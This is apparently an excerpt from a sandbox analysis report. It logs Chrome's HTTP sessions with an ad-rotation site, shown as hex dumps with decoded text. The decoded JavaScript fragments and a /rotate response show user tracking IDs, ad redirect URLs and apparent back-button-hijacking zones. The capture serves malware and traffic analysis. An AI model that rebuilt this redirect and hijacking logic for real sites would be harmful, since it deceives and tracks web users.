                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: image
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:23 UTC499INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:23 GMT
                                                                                                          Content-Type: image/svg+xml
                                                                                                          Content-Length: 2652
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: "677a5f14-a5c"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 987
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:23 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Accept-Ranges: bytes
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb416b89366a5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:23 UTC870INData Raw: 3c 73 76 67 20 68 65 69 67 68 74 3d 22 35 31 32 22 20 77 69 64 74 68 3d 22 35 31 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 34 34 35 20 31 36 37 2e 33 36 34 63 34 2e 31 34 33 20 30 20 37 2e 35 2d 33 2e 33 35 37 20 37 2e 35 2d 37 2e 35 56 31 30 37 2e 35 63 30 2d 31 32 2e 34 30 36 2d 31 30 2e 30 39 34 2d 32 32 2e 35 2d 32 32 2e 35 2d 32 32 2e 35 68 2d 37 2e 35 56 36 35 63 30 2d 31 32 2e 34 30 36 2d 31 30 2e 30 39 34 2d 32 32 2e 35 2d 32 32 2e 35 2d 32 32 2e 35 68 2d 37 2e 35 76 2d 32 30 43 33 39 32 2e 35 20 31 30 2e 30 39 34 20 33 38 32 2e 34 30 36 20 30 20 33 37 30 20 30 48 38 32 43 36 39 2e 35 39 33 20 30 20 35 39 2e 35
                                                                                                          Data Ascii: <svg height="512" width="512" xmlns="http://www.w3.org/2000/svg"><path fill="#fff" d="M445 167.364c4.143 0 7.5-3.357 7.5-7.5V107.5c0-12.406-10.094-22.5-22.5-22.5h-7.5V65c0-12.406-10.094-22.5-22.5-22.5h-7.5v-20C392.5 10.094 382.406 0 370 0H82C69.593 0 59.5
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 2d 31 30 2e 30 39 34 20 32 32 2e 35 2d 32 32 2e 35 76 2d 33 34 37 68 37 2e 35 63 34 2e 31 33 36 20 30 20 37 2e 35 20 33 2e 33 36 34 20 37 2e 35 20 37 2e 35 76 33 38 32 63 30 20 34 2e 31 33 36 2d 33 2e 33 36 34 20 37 2e 35 2d 37 2e 35 20 37 2e 35 68 2d 34 38 2e 33 31 39 63 2d 34 2e 31 34 33 20 30 2d 37 2e 35 20 33 2e 33 35 37 2d 37 2e 35 20 37 2e 35 73 33 2e 33 35 37 20 37 2e 35 20 37 2e 35 20 37 2e 35 48 34 30 30 63 31 32 2e 34 30 36 20 30 20 32 32 2e 35 2d 31 30 2e 30 39 34 20 32 32 2e 35 2d 32 32 2e 35 56 31 30 30 68 37 2e 35 63 34 2e 31 33 36 20 30 20 37 2e 35 20 33 2e 33 36 34 20 37 2e 35 20 37 2e 35 76 35 32 2e 33 36 34 63 30 20 34 2e 31 34 33 20 33 2e 33 35 37 20 37 2e 35 20 37 2e 35 20 37 2e 35 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66
                                                                                                          Data Ascii: -10.094 22.5-22.5v-347h7.5c4.136 0 7.5 3.364 7.5 7.5v382c0 4.136-3.364 7.5-7.5 7.5h-48.319c-4.143 0-7.5 3.357-7.5 7.5s3.357 7.5 7.5 7.5H400c12.406 0 22.5-10.094 22.5-22.5V100h7.5c4.136 0 7.5 3.364 7.5 7.5v52.364c0 4.143 3.357 7.5 7.5 7.5z"/><path fill="#f
                                                                                                          2025-01-06 11:09:23 UTC413INData Raw: 2e 35 2d 33 68 2d 31 32 30 63 2d 34 2e 31 34 32 20 30 2d 37 2e 35 20 33 2e 33 35 37 2d 37 2e 35 20 37 2e 35 73 33 2e 33 35 38 20 37 2e 35 20 37 2e 35 20 37 2e 35 68 31 32 30 63 34 2e 31 34 33 20 30 20 37 2e 35 2d 33 2e 33 35 37 20 37 2e 35 2d 37 2e 35 73 2d 33 2e 33 35 37 2d 37 2e 35 2d 37 2e 35 2d 37 2e 35 7a 6d 30 20 33 32 68 2d 31 32 30 63 2d 34 2e 31 34 32 20 30 2d 37 2e 35 20 33 2e 33 35 37 2d 37 2e 35 20 37 2e 35 73 33 2e 33 35 38 20 37 2e 35 20 37 2e 35 20 37 2e 35 68 31 32 30 63 34 2e 31 34 33 20 30 20 37 2e 35 2d 33 2e 33 35 37 20 37 2e 35 2d 37 2e 35 73 2d 33 2e 33 35 37 2d 37 2e 35 2d 37 2e 35 2d 37 2e 35 7a 6d 2d 33 38 2d 33 31 35 68 2d 31 33 38 63 2d 31 33 2e 37 38 35 20 30 2d 32 35 20 31 31 2e 32 31 35 2d 32 35 20 32 35 73 31 31 2e 32 31 35
                                                                                                          Data Ascii: .5-3h-120c-4.142 0-7.5 3.357-7.5 7.5s3.358 7.5 7.5 7.5h120c4.143 0 7.5-3.357 7.5-7.5s-3.357-7.5-7.5-7.5zm0 32h-120c-4.142 0-7.5 3.357-7.5 7.5s3.358 7.5 7.5 7.5h120c4.143 0 7.5-3.357 7.5-7.5s-3.357-7.5-7.5-7.5zm-38-315h-138c-13.785 0-25 11.215-25 25s11.215


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          61192.168.2.450108104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:23 UTC479OUTGET /_next/static/media/comments-empty-user.c37f32b6.webp HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:23 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:23 GMT
                                                                                                          Content-Type: image/webp
                                                                                                          Content-Length: 264
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: "677a5f14-108"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1628
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:23 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Accept-Ranges: bytes
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb416b7eb341e6-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:23 UTC264INData Raw: 52 49 46 46 00 01 00 00 57 45 42 50 56 50 38 20 f4 00 00 00 b0 0c 00 9d 01 2a 64 00 64 00 3e d1 60 a6 4d 28 26 23 a2 2d be 78 01 00 1a 09 67 00 d1 88 a8 d1 6d a4 04 c2 b9 41 25 5d ee a0 7b 6e 9e 0a 58 b6 6a a1 f3 42 89 09 ab c6 b7 81 db 25 4e 94 a1 86 c8 02 e9 55 80 fc f3 8a 07 39 97 94 0c 5e bc f4 94 48 be a6 90 91 f7 39 74 97 83 bd f6 e5 64 6c 4a be 4c e6 40 9d 45 93 ab eb 84 80 38 00 00 fe ee e9 80 fe d3 4c 59 44 bf 9c b7 d0 47 38 73 3f 1f 83 47 08 18 46 06 f4 bd b6 53 d0 d0 7c 35 b8 2f ec 99 27 cb 0e fa 58 a3 38 67 c6 c1 d6 bf 84 54 7d 46 4a 50 cb 35 a6 ca df 1b 6a 46 e4 dc 1b 5d 5e ce 85 01 e0 b1 e6 dd 67 99 31 2b 7e 08 d9 de b5 bf fd a9 68 6b dc 08 e5 d2 ed 39 40 e6 5a 64 58 c7 48 b9 81 8d 48 79 d4 9a 09 a7 d9 8a b6 e3 f3 e4 b7 ba f0 9a 5f 84 36 61
                                                                                                          Data Ascii: RIFFWEBPVP8 *dd>`M(&#-xgmA%]{nXjB%NU9^H9tdlJL@E8LYDG8s?GFS|5/'X8gT}FJP5jF]^g1+~hk9@ZdXHHy_6a


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          62192.168.2.450110104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:23 UTC497OUTGET /_next/static/chunks/cce078a36fb49fc2-1736072686539.a4de873c342c784d.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:23 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:23 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-c68"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1056
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:23 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb416bcc9d42ac-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:23 UTC874INData Raw: 63 36 38 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 30 30 38 36 5d 2c 7b 38 30 30 38 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 61 2c 65 29 7b 65 2e 72 28 61 29 3b 76 61 72 20 72 3d 65 28 39 38 37 38 38 29 2c 6e 3d 65 28 32 32 39 37 30 29 2c 6f 3d 65 28 35 36 37 35 33 29 2c 73 3d 65 28 31 32 31 33 39 29 2c 69 3d 65 28 31 38 33 39 34 29 2c 6c 3d 65 28 31 37 39 36 39 29 2c 63 3d 65 28 37 31 39 36 31 29 2c 75 3d 65 28 35 32 39 32 39 29 2c 64 3d 65 28 33 35 31 34 37 29 2c 70 3d 65 28 37 32 31 38 31 29 2c 66 3d 65 28 35 33 34 34 34 29 2c 68 3d 65 28 35 31 36 35 39 29 2c 6d 3d 65 28 31 39 34
                                                                                                          Data Ascii: c68"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[80086],{80086:function(t,a,e){e.r(a);var r=e(98788),n=e(22970),o=e(56753),s=e(12139),i=e(18394),l=e(17969),c=e(71961),u=e(52929),d=e(35147),p=e(72181),f=e(53444),h=e(51659),m=e(194
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 30 2c 68 2e 70 52 29 28 74 2e 7a 6f 6e 65 73 29 7d 29 29 2e 6a 6f 69 6e 28 22 3b 22 29 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 28 30 2c 72 2e 5a 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 65 2c 72 2c 6f 2c 73 2c 75 3b 72 65 74 75 72 6e 28 30 2c 6e 2e 5f 5f 67 65 6e 65 72 61 74 6f 72 29 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 73 77 69 74 63 68 28 6e 2e 6c 61 62 65 6c 29 7b 63 61 73 65 20 30 3a 28 65 3d 6e 65 77 20 55 52 4c 28 6c 2e 42 47 26 26 67 2e 65 6e 76 2e 4e 45 58 54 5f 50 55 42 4c 49 43 5f 51 41 5f 4f 52 49 47 49 4e 3f 67 2e 65 6e 76 2e 4e 45 58 54 5f 50 55 42 4c 49 43 5f 51 41 5f 4f 52 49 47 49 4e 3a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e
                                                                                                          Data Ascii: nction(t){return(0,h.pR)(t.zones)})).join(";"),e=function(){var a=(0,r.Z)((function(){var a,e,r,o,s,u;return(0,n.__generator)(this,(function(n){switch(n.label){case 0:(e=new URL(l.BG&&g.env.NEXT_PUBLIC_QA_ORIGIN?g.env.NEXT_PUBLIC_QA_ORIGIN:window.location
                                                                                                          2025-01-06 11:09:23 UTC940INData Raw: 3d 20 22 2c 73 29 3b 76 61 72 20 69 3d 65 5b 61 5d 2c 6c 3d 72 5b 61 5d 2c 75 3d 6e 5b 61 5d 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 73 29 7b 76 61 72 20 64 3d 28 30 2c 68 2e 24 39 29 28 73 29 2c 66 3d 28 30 2c 70 2e 48 50 29 28 7b 75 72 6c 3a 73 2c 74 79 70 65 3a 64 3f 22 69 70 70 22 3a 22 6f 6e 63 6c 69 63 6b 22 2c 6f 61 69 64 3a 5f 2c 6f 73 56 65 72 73 69 6f 6e 3a 4e 2e 64 61 74 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2c 73 75 62 49 64 3a 6b 2c 70 61 73 73 50 61 72 61 6d 54 6f 50 61 72 61 6d 73 3a 49 7d 29 3b 6f 2e 70 75 73 68 28 7b 7a 6f 6e 65 4e 61 6d 65 3a 69 2c 75 72 6c 3a 66 2c 74 61 62 3a 6c 2c 77 65 69 67 68 74 3a 75 7d 29 7d 65 6c 73 65 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 2f 72 6f 74 61 74 65 3a
                                                                                                          Data Ascii: = ",s);var i=e[a],l=r[a],u=n[a];if("string"===typeof s){var d=(0,h.$9)(s),f=(0,p.HP)({url:s,type:d?"ipp":"onclick",oaid:_,osVersion:N.data.platformVersion,subId:k,passParamToParams:I});o.push({zoneName:i,url:f,tab:l,weight:u})}else console.error("/rotate:
                                                                                                          2025-01-06 11:09:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          63192.168.2.450109104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:23 UTC876OUTGET /rotate?var=8645117&ymid=615-538bd0d9&click_id=900090192959910233&rhd=1&var_3=M7456757949717807127&oaid=1zy28050kovbfyyc4yz4gsq62pkmaxhb&os_version=10.0.0&btz=America%2FNew_York&bto=300&zz=4292526%3B5128285%3B4326653%3B4949467%3B5381235%3B8372416%3B5381316%3B8372719%3B5381307&uid=1zy28050kovbfyyc4yz4gsq62pkmaxhb HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:23 UTC950INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:23 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Vary: Accept-Encoding
                                                                                                          X-Trace-Id: 5218d252e33872ed9cf06b5e4c908b02
                                                                                                          Accept-Ch: Sec-CH-UA, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model
                                                                                                          Access-Control-Allow-Origin: https://wungoangeredsa.com/
                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding, baggage, sentry-trace
                                                                                                          Pragma: no-cache
                                                                                                          Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
                                                                                                          Expires: Tue, 11 Jan 1994 10:00:00 GMT
                                                                                                          Timing-Allow-Origin: *
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb416bb8ed19b6-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:23 UTC419INData Raw: 39 64 33 0d 0a 7b 22 61 64 73 22 3a 5b 7b 22 63 6c 69 63 6b 22 3a 22 68 74 74 70 73 3a 2f 2f 77 75 6e 67 6f 61 6e 67 65 72 65 64 73 61 2e 63 6f 6d 2f 77 65 6e 32 35 74 76 68 2f 34 32 30 39 39 34 32 3f 76 61 72 3d 38 36 34 35 31 31 37 5c 75 30 30 32 36 79 6d 69 64 3d 36 31 35 2d 35 33 38 62 64 30 64 39 5c 75 30 30 32 36 63 6c 69 63 6b 5f 69 64 3d 39 30 30 30 39 30 31 39 32 39 35 39 39 31 30 32 33 33 5c 75 30 30 32 36 72 68 64 3d 31 5c 75 30 30 32 36 76 61 72 5f 33 3d 4d 37 34 35 36 37 35 37 39 34 39 37 31 37 38 30 37 31 32 37 5c 75 30 30 32 36 6f 73 5f 76 65 72 73 69 6f 6e 3d 31 30 2e 30 2e 30 5c 75 30 30 32 36 62 74 7a 3d 41 6d 65 72 69 63 61 25 32 46 4e 65 77 5f 59 6f 72 6b 5c 75 30 30 32 36 62 74 6f 3d 33 30 30 5c 75 30 30 32 36 75 73 65 72 49 64 3d 31
                                                                                                          Data Ascii: 9d3{"ads":[{"click":"https://wungoangeredsa.com/wen25tvh/4209942?var=8645117\u0026ymid=615-538bd0d9\u0026click_id=900090192959910233\u0026rhd=1\u0026var_3=M7456757949717807127\u0026os_version=10.0.0\u0026btz=America%2FNew_York\u0026bto=300\u0026userId=1
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 3d 31 5c 75 30 30 32 36 76 61 72 5f 33 3d 4d 37 34 35 36 37 35 37 39 34 39 37 31 37 38 30 37 31 32 37 5c 75 30 30 32 36 6f 73 5f 76 65 72 73 69 6f 6e 3d 31 30 2e 30 2e 30 5c 75 30 30 32 36 62 74 7a 3d 41 6d 65 72 69 63 61 25 32 46 4e 65 77 5f 59 6f 72 6b 5c 75 30 30 32 36 62 74 6f 3d 33 30 30 5c 75 30 30 32 36 75 73 65 72 49 64 3d 31 7a 79 32 38 30 35 30 6b 6f 76 62 66 79 79 63 34 79 7a 34 67 73 71 36 32 70 6b 6d 61 78 68 62 22 7d 2c 7b 22 63 6c 69 63 6b 22 3a 22 68 74 74 70 73 3a 2f 2f 77 75 6e 67 6f 61 6e 67 65 72 65 64 73 61 2e 63 6f 6d 2f 77 65 6e 32 35 74 76 68 2f 34 32 39 32 36 37 34 3f 76 61 72 3d 38 36 34 35 31 31 37 5c 75 30 30 32 36 79 6d 69 64 3d 36 31 35 2d 35 33 38 62 64 30 64 39 5c 75 30 30 32 36 63 6c 69 63 6b 5f 69 64 3d 39 30 30 30 39 30
                                                                                                          Data Ascii: =1\u0026var_3=M7456757949717807127\u0026os_version=10.0.0\u0026btz=America%2FNew_York\u0026bto=300\u0026userId=1zy28050kovbfyyc4yz4gsq62pkmaxhb"},{"click":"https://wungoangeredsa.com/wen25tvh/4292674?var=8645117\u0026ymid=615-538bd0d9\u0026click_id=900090
                                                                                                          2025-01-06 11:09:23 UTC734INData Raw: 33 33 5c 75 30 30 32 36 72 68 64 3d 31 5c 75 30 30 32 36 76 61 72 5f 33 3d 4d 37 34 35 36 37 35 37 39 34 39 37 31 37 38 30 37 31 32 37 5c 75 30 30 32 36 6f 73 5f 76 65 72 73 69 6f 6e 3d 31 30 2e 30 2e 30 5c 75 30 30 32 36 62 74 7a 3d 41 6d 65 72 69 63 61 25 32 46 4e 65 77 5f 59 6f 72 6b 5c 75 30 30 32 36 62 74 6f 3d 33 30 30 5c 75 30 30 32 36 75 73 65 72 49 64 3d 31 7a 79 32 38 30 35 30 6b 6f 76 62 66 79 79 63 34 79 7a 34 67 73 71 36 32 70 6b 6d 61 78 68 62 22 7d 2c 7b 22 63 6c 69 63 6b 22 3a 22 68 74 74 70 73 3a 2f 2f 77 75 6e 67 6f 61 6e 67 65 72 65 64 73 61 2e 63 6f 6d 2f 77 65 6e 32 35 74 76 68 2f 38 33 37 32 38 35 34 3f 76 61 72 3d 38 36 34 35 31 31 37 5c 75 30 30 32 36 79 6d 69 64 3d 36 31 35 2d 35 33 38 62 64 30 64 39 5c 75 30 30 32 36 63 6c 69 63
                                                                                                          Data Ascii: 33\u0026rhd=1\u0026var_3=M7456757949717807127\u0026os_version=10.0.0\u0026btz=America%2FNew_York\u0026bto=300\u0026userId=1zy28050kovbfyyc4yz4gsq62pkmaxhb"},{"click":"https://wungoangeredsa.com/wen25tvh/8372854?var=8645117\u0026ymid=615-538bd0d9\u0026clic
                                                                                                          2025-01-06 11:09:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          64192.168.2.450111104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:23 UTC553OUTGET /_next/static/chunks/265d60a91fd3d6b8-1736072686539.748820502fe4525b.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:23 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:23 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-ec3"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1056
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:23 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb416ba9e443b9-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:23 UTC874INData Raw: 65 63 33 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 38 39 30 34 5d 2c 7b 35 30 36 35 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 2e 64 28 6e 2c 7b 4e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 7d 7d 29 3b 76 61 72 20 74 3d 72 28 31 32 31 33 39 29 2c 6f 3d 72 28 36 31 36 35 36 29 2c 61 3d 72 28 38 33 32 31 36 29 2c 69 3d 72 28 37 31 39 36 31 29 2c 63 3d 72 28 33 35 31 34 37 29 2c 75 3d 72 28 32 31 38 31 38 29 2c 73 3d 72 28 35 31 36 35 39 29 2c 6c 3d 72 28 39 34 33 39 37 29 2c 64 3d 72 28 31 39 34 39 35 29 2c 66 3d 5b 22 63 6f 61 6a 75 74 6f 61 2e 63 6f
                                                                                                          Data Ascii: ec3"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[38904],{50656:function(e,n,r){r.d(n,{N:function(){return v}});var t=r(12139),o=r(61656),a=r(83216),i=r(71961),c=r(35147),u=r(21818),s=r(51659),l=r(94397),d=r(19495),f=["coajutoa.co
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 61 72 20 6c 2c 64 2c 76 2c 62 2c 45 3d 6e 75 6c 6c 21 3d 3d 28 6c 3d 6b 2e 62 61 63 6b 2e 68 69 73 74 6f 72 79 54 69 6d 65 41 6d 6f 75 6e 74 29 26 26 76 6f 69 64 20 30 21 3d 3d 6c 3f 6c 3a 33 2c 6d 3d 6e 75 6c 6c 3d 3d 3d 28 74 3d 6b 2e 62 61 63 6b 2e 7a 6f 6e 65 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 66 69 6e 64 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 3d 3d 3d 75 2e 77 2e 62 61 63 6b 7d 29 29 3b 69 66 28 6d 29 76 3d 28 30 2c 73 2e 6b 36 29 28 75 2e 77 2e 62 61 63 6b 29 2c 64 3d 6d 3b 65 6c 73 65 20 64 3d 6e 75 6c 6c 3d 3d 3d 28 62 3d 6b 2e 62 61 63 6b 2e 7a 6f 6e 65 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 62 3f 76 6f 69 64 20 30 3a 62 2e 66 69 6e 64 28 28 66 75 6e 63 74 69 6f 6e 28
                                                                                                          Data Ascii: ar l,d,v,b,E=null!==(l=k.back.historyTimeAmount)&&void 0!==l?l:3,m=null===(t=k.back.zones)||void 0===t?void 0:t.find((function(e){return e.type===u.w.back}));if(m)v=(0,s.k6)(u.w.back),d=m;else d=null===(b=k.back.zones)||void 0===b?void 0:b.find((function(
